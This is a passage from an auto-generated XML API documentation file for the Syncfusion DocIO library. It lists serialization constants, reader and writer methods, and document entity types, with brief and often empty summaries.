            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.DashStyle">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Line">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Fill">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Transform">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.M11">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.M12">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.M21">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.M22">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.D1">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.D2">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.PropertyNames.#ctor">
            <summary>
            This constructor is bever used.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.XDLSConstants">
            <summary>
            Constants used in DLS for serialization to XML format  
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.SectionsTag">
            <summary>
            Document tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.SectionItemTag">
            <summary>
            Section tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.SectionBreakCodeAttr">
            <summary>
            Section attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.StyleItemTag">
            <summary>
            Style tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ListLevelItemTag">
            <summary>
            List tag and attribute names
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ListFormatTypeAttr">
            <summary>
             List style attributes names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.StyleNameAttr">
            <summary>
            Style attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PenColorAttr">
            <summary>
            Pen attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PSPageHeightAttr">
            <summary>
            PageSettings attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.EvenHeaderTag">
            <summary>
            HeadersFooters attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ColumnItemTag">
            <summary>
            Tables tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TableVrAlignmentAttr">
            <summary>
            Tables attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ParagraphItemTag">
            <summary>
            Paragraph tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ParagraphTabsAttr">
            <summary>
            ParagraphFormat attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TabPositionAttr">
            <summary>
            Tab attribute name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ShapeItemTag">
            <summary>
            Shape tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ColumnWidthAttr">
            <summary>
            Column attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ImageTag">
            <summary>
            Image tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ImageIsMetafileAttr">
            <summary>
            Image attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.WidthScale">
            <summary>
            Width scale attributes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.HeightScale">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PictBrightnessAttr">
            <summary>
            Image quality attributes names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TextRangeTag">
            <summary>
            TextRange tag name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TextTag">
            <summary>
            TextRange child tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TypeTag">
            <summary>
            Type tag
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PaddingBottomTag">
            <summary>
            Paddings tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.BorderBottomTag">
            <summary>
            Borders tag names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.BorderColorAttr">
            <summary>
            Borders attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TextColorAttr">
            <summary>
            CharacterFormat attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TextBoxFormatTag">
            <summary>
            TextBox tag name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ShapeWidthAttr">
            <summary>
            TextBoxFormat attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.HFTextBoxesTag">
            <summary>
            TextBoxes tag
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.BookMarkNameAttr">
            <summary>
            Bookmark attributes name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.FilePath">
            <summary>
            Hyperlink attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PictureCharFormatTag">
            <summary>
            Picture formatting tag.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.BreakTypeAttr">
            <summary>
            Break atrribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.DOPFormatting1Attr">
            <summary>
            DOP internal data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.StandardAsciiFont">
            <summary>
            Standard font names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.MergeFieldNameAttr">
            <summary>
            Merge field attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.EmbedFieldStorageNameAttr">
            <summary>
            Attribute name for embedded object storage name containing
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.FormFieldParamsAttr">
            <summary>
            FormField attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.FormFieldDropDownItemsTag">
            <summary>
             FormField attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.BuiltinPropertiesTag">
            <summary>
            Document properties tag names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.StyleIdAttr">
            <summary>
            Styles attributes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PropertiesCompanyAttr">
            <summary>
            Document properties attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PropertiesTypeAttr">
            <summary>
             Property attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ListFormatListTypeAttr">
            <summary>
            Attributes for ListFormatting.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TableIsAutoResizedAttr">
            <summary>
            Table`s attributes names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.InternalDataTag">
            <summary>
            Internal Data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ShapeContainerDataTag">
            <summary>
            ShapeObject tags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ShapeObjIsOLEAttr">
            <summary>
            ShapeObjject attribute names
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TextShadowAttr">
            <summary>
            WCharacterFormat attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TextBorderTag">
            <summary>
            WCharacterFormat tag names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ParagraphLineSpacingAttr">
            <summary>
            ParagraphFormat attribute names.
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ViewSetupTag">
            <summary>
            ViewSetup tag names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ViewSetupZoomPercentAttr">
            <summary>
            ViewSetup attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.PageSetupLineNumStepAttr">
            <summary>
            WPageSetup attribute names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.SymbolCharCodeAttr">
            <summary>
            Attributes names for characters.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.TextBoxTag">
            <summary>
            Textbox tag name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.ShapeHorizOriginAttr">
            <summary>
            Shape attribute names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.CommentTag">
            <summary>
            Comment tags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.FootnoteTag">
            <summary>
            Footnote tags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.WatermarkTag">
            <summary>
            Watermark. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.BackgroundTag">
            <summary>
            Background effects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.EmbedObjectStorageNameAttr">
            <summary>
             Embedded object storage tags
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSConstants.GrammarDataTag">
            <summary>
            Grammar and spelling data tags
            </summary>    
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.XDLSCustomRW">
            <summary>
            Summary description for XDLSCustomRW.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.m_reader">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XML.XDLSCustomRW"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.Write(System.Xml.XmlWriter,System.String,System.Object)">
            <summary>
            Writes the specified writer.
            </summary>
            <param name="writer">The writer.</param>
            <param name="tagName">Name of the tag.</param>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.Read(System.Xml.XmlReader,System.Type)">
            <summary>
            Reads the specified reader.
            </summary>
            <param name="reader">The reader.</param>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.WriteMatrix(System.String,System.Drawing.Drawing2D.Matrix)">
            <summary>
            
            </summary>
            <param name="name"></param>
            <param name="matrix"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.WriteColor(System.String,System.Drawing.Color)">
            <summary>
            
            </summary>
            <param name="name"></param>
            <param name="color"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.WriteFont(System.String,System.Drawing.Font)">
            <summary>
            
            </summary>
            <param name="name"></param>
            <param name="font"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.ReadFont">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.ReadColor">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSCustomRW.ReadMatrix">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.XDLSHolder">
            <summary>
            Summary description for DLSXmlHolder.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XML.XDLSHolder"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.AddElement(System.String,System.Object)">
            <summary>
            Adds the element.
            </summary>
            <param name="tagName">Name of the tag.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.AddRefElement(System.String,System.Object)">
            <summary>
            Adds the ref element.
            </summary>
            <param name="tagName">Name of the tag.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.WriteHolder(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes the holder.
            </summary>
            <param name="writer">The writer.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.ReadHolder(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads the holder.
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.AfterDeserialization(Syncfusion.DocIO.DLS.XML.IXDLSSerializable)">
            <summary>
            After the deserialization.
            </summary>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.BeforeSerialization">
            <summary>
            Before the serialization.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.Clear">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSHolder.Close">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSHolder.ID">
            <summary>
            Gets or sets the ID.
            </summary>
            <value>The ID.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSHolder.Cleared">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.XML.XDLSHolder"/> is cleared.
            </summary>
            <value>if it cleared, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSHolder.EnableID">
            <summary>
            Gets or sets a value indicating whether [enable ID].
            </summary>
            <value>If it is enable ID, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSHolder.SkipMe">
            <summary>
            Gets or sets a value indicating whether [skip me].
            </summary>
            <value>If it specifies to skip, set to <c>true</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.XDLSReader">
            <summary>
            Summary description for XDLSReader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSReader.m_reader">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.#ctor(System.Xml.XmlReader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XML.XDLSReader"/> class.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.Deserialize(Syncfusion.DocIO.DLS.XML.IXDLSSerializable)">
            <summary>
            Deserializes the specified value.
            </summary>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.HasAttribute(System.String)">
            <summary>
            Determines whether the current node has attribute with specified name.
            </summary>
            <param name="name">The name.</param>
            <returns>
            	if has attribute with specified name, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadString(System.String)">
            <summary>
            Reads the string.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadInt(System.String)">
            <summary>
            Reads the int.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadShort(System.String)">
            <summary>
            Reads the short.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadDouble(System.String)">
            <summary>
            Reads the double.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadFloat(System.String)">
            <summary>
            Reads the float.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadBoolean(System.String)">
            <summary>
            Reads the boolean.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadByte(System.String)">
            <summary>
            Reads the byte.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadEnum(System.String,System.Type)">
            <summary>
            Reads the enum.
            </summary>
            <param name="name">The name.</param>
            <param name="enumType">Type of the enum.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadColor(System.String)">
            <summary>
            Reads color from XML.
            </summary>
            <param name="name">Name of attribute.</param>
            <returns>Color structure.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.GetHexColor(System.String)">
            <summary>
            Gets the hexadecimal color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadDateTime(System.String)">
            <summary>
            Reads color from XML.
            </summary>
            <param name="name">Name of attribute.</param>
            <returns>Color structure.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.GetAttributeValue(System.String)">
            <summary>
            Gets the attribute value.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ParseElementType(System.Type,System.Enum@)">
            <summary>
            Parses the type of the element.
            </summary>
            <param name="enumType">Type of the enum.</param>
            <param name="elementType">Type of the element.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadChildElement(System.Object)">
            <summary>
            Reads the child element.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadChildElement(System.Type)">
            <summary>
            Reads the child element.
            </summary>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadChildStringContent">
            <summary>
            Reads the content of the child string.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadChildBinaryElement">
            <summary>
            Reads binary value.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadImage">
            <summary>
            Reads the image.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadImage(System.Boolean)">
            <summary>
            Reads the image.
            </summary>
            <param name="isMetafile">if it is a metafile, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadElement(Syncfusion.DocIO.DLS.XML.IXDLSSerializable)">
            <summary>
            
            </summary>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSReader.ReadElementCollection(Syncfusion.DocIO.DLS.XML.IXDLSSerializableCollection)">
            <summary>
            
            </summary>
            <param name="coll"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSReader.TagName">
            <summary>
            Gets the name of the tag.
            </summary>
            <value>The name of the tag.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSReader.NodeType">
            <summary>
            Gets the type of the node.
            </summary>
            <value>The type of the node.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSReader.InnerReader">
            <summary>
            Gets the inner reader.
            </summary>
            <value>The inner reader.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSReader.AttributeReader">
            <summary>
            Gets the attribute reader.
            </summary>
            <value>The attribute reader.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.XDLSWriter">
            <summary>
            Summary description for DLSXmlWriter.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSWriter.DEF_SHARP">
            <summary>
            Symbol, used during color saving to XML.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSWriter.DEF_HEX_FORMAT">
            <summary>
            format for color convertion to string.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSWriter.m_writer">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.#ctor(System.Xml.XmlWriter)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.Serialize(Syncfusion.DocIO.DLS.XML.IXDLSSerializable)">
            <summary>
            
            </summary>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteElement(System.String,Syncfusion.DocIO.DLS.XML.IXDLSSerializable,System.Boolean)">
            <summary>
            
            </summary>
            <param name="tagName"></param>
            <param name="value"></param>
            <param name="isWriteID"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteCollectionElement(System.String,Syncfusion.DocIO.DLS.XML.IXDLSSerializableCollection)">
            <summary>
            
            </summary>
            <param name="tagName"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteCustomElement(System.String,System.Object)">
            <summary>
            <exclude/>
            </summary>
            <param name="tagName"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteDefElement(System.String,System.Object)">
            <summary>
            
            </summary>
            <param name="tagName"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.Single)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.Double)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.Int32)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.String)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.Enum)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.Boolean)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">if it is specifies value, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.Drawing.Color)">
            <summary>
            Writes color as string to XML.
            </summary>
            <param name="name">Name of attribute.</param>
            <param name="value">Color structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteValue(System.String,System.DateTime)">
            <summary>
            Writes DateTime as string to XML.
            </summary>
            <param name="name">Name of attribute.</param>
            <param name="value">Color structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteChildStringElement(System.String,System.String)">
            <summary>
            Writes the child string element.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteChildBinaryElement(System.String,System.Byte[])">
            <summary>
            Writes binary value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteChildElement(System.String,System.Object)">
            <summary>
            Writes the child element.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteChildRefElement(System.String,System.Int32)">
            <summary>
            Writes the child ref element.
            </summary>
            <param name="name">The name.</param>
            <param name="refToElement">The ref to element.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.WriteImage(System.Drawing.Image)">
            <summary>
            Writes the image.
            </summary>
            <param name="image">The image.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.PlayInMeta(System.Drawing.Imaging.EmfPlusRecordType,System.Int32,System.Int32,System.IntPtr,System.Drawing.Imaging.PlayRecordCallback)">
            <summary>
            
            </summary>
            <param name="recordType"></param>
            <param name="flags"></param>
            <param name="dataSize"></param>
            <param name="data"></param>
            <param name="callbackData"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSWriter.CreateStreamFromImage(System.Drawing.Image)">
            <summary>
            
            </summary>
            <param name="image"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSWriter.InnerWriter">
            <summary>
            Gets the inner writer.
            </summary>
            <value>The inner writer.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntityType">
            <summary>
            Specifies the type of a DLS entity.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.WordDocument">
            <summary>
            Main Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Section">
            <summary>
            Section in the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.TextBody">
            <summary>
            Text body in the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.HeaderFooter">
            <summary>
            Header and Footer in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Paragraph">
            <summary>
            Paragraph in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.AlternateChunk">
            <summary>
            AlternateChunk in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.StructureDocumentTag">
            <summary>
            Structure Document Tag in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.StructureDocumentTagInline">
            <summary>
            Structure Document Tag Inline in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.StructureDocumentTagRow">
            <summary>
            Structure Document Tag Row in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.StructureDocumentTagCell">
            <summary>
            Structure Document Tag Cell in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.SDTBlockContent">
            <summary>
            Structure Document Tag Block Content in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.SDTInlineContent">
            <summary>
            Structure Document Tag Inline Content in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.SDTRowContent">
            <summary>
            Structure Document Tag Row Content in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.SDTCellContent">
            <summary>
            Structure Document Tag Cell Content in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Table">
            <summary>
            Table in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.TableRow">
            <summary>
            Table row in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.TableCell">
            <summary>
            Table Cell in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.TextRange">
            <summary>
            Text run in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Picture">
            <summary>
            Picture in the Word document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityType.Field">
            <summary>
            Field in the Word document
            </summary>
        </member>
